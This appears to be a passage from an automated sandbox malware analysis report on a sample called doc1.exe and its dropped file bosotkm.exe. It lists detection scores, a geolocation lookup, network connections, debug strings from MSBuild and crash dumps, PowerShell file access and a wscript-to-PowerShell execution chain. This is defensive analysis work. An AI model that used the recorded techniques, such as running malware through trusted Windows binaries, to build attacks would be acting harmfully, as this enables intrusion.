                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeReversingLabs: Detection: 52%
                  Multi AV Scanner detection for submitted file
                  Source: doc1.exeReversingLabs: Detection: 52%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: doc1.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: doc1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49717 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49726 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49743 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49758 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.6:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.6:49738 version: TLS 1.2
                  Source: doc1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDBJ source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb|) source: MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdbH source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdbS source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb\dp`d source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb= source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbH source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbYQ source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2562731419.000000000154D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbs source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb((^ source: MSBuild.exe, 00000016.00000002.2558663468.00000000014E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb` source: WERC3B0.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\MSBuild.pdb,) source: MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdbf source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbL} source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbL08w# source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: mscorlib.pdb7 source: WERABFD.tmp.dmp.43.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdbH source: MSBuild.exe, 00000016.00000002.2558663468.0000000001468000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304587014.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.00000000043AB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdbV source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbw source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Core.pdbMSBuild.exe source: WERC3B0.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbS source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb6 source: WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb$ source: MSBuild.exe, 00000023.00000002.2864210130.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB089 source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb! source: MSBuild.exe, 00000016.00000002.2558663468.0000000001468000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: ?pnC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb" source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb3 source: MSBuild.exe, 00000029.00000002.3038113235.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb4 source: WERABFD.tmp.dmp.43.dr, WER2A88.tmp.dmp.31.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb!z source: MSBuild.exe, 00000023.00000002.2864210130.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdbV source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdbS source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbl)B source: MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.pdbxW source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb== source: MSBuild.exe, 0000000C.00000002.2457220076.0000000000F43000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbJ@2 source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Core.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: osymbols\exe\MSBuild.pdb source: MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdb4 source: WERC3B0.tmp.dmp.15.dr
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsers\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:r source: MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.pdbH source: WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbeh source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HPdn0C:\Windows\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB89 source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: @pn.pdb5w source: MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304587014.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.00000000043AB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb~x+h5 source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb089 source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdb.x source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: mscorlib.pdbL}f source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbH source: WER2A88.tmp.dmp.31.dr
                  Source: Binary string: System.Core.pdb`d source: WERABFD.tmp.dmp.43.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbll source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdbt source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Drawing.pdbL08w# source: WERABFD.tmp.dmp.43.dr
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdb;h source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001468000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdbB@* source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @pn.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbn source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb*p source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb0q source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbhWH source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb* source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbd5 source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then jmp 057FABF0h1_2_057FAB38
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then jmp 057FABF0h1_2_057FAB33
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then jmp 057F3F5Ch1_2_057F3BD8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then jmp 057F3F5Ch1_2_057F3BC8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h1_2_057FF3A0
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h1_2_057FF398
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h1_2_0580D2D8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then jmp 0581115Fh1_2_058110E9
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then jmp 0581115Fh1_2_058110F8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then jmp 0581115Fh1_2_05811339
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 4x nop then jmp 0581115Fh1_2_058112A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00DDE62Fh4_2_00DDE441
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00DDEFB9h4_2_00DDE441
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00DDFA49h4_2_00DDF788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_00DDE015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_00DDD800
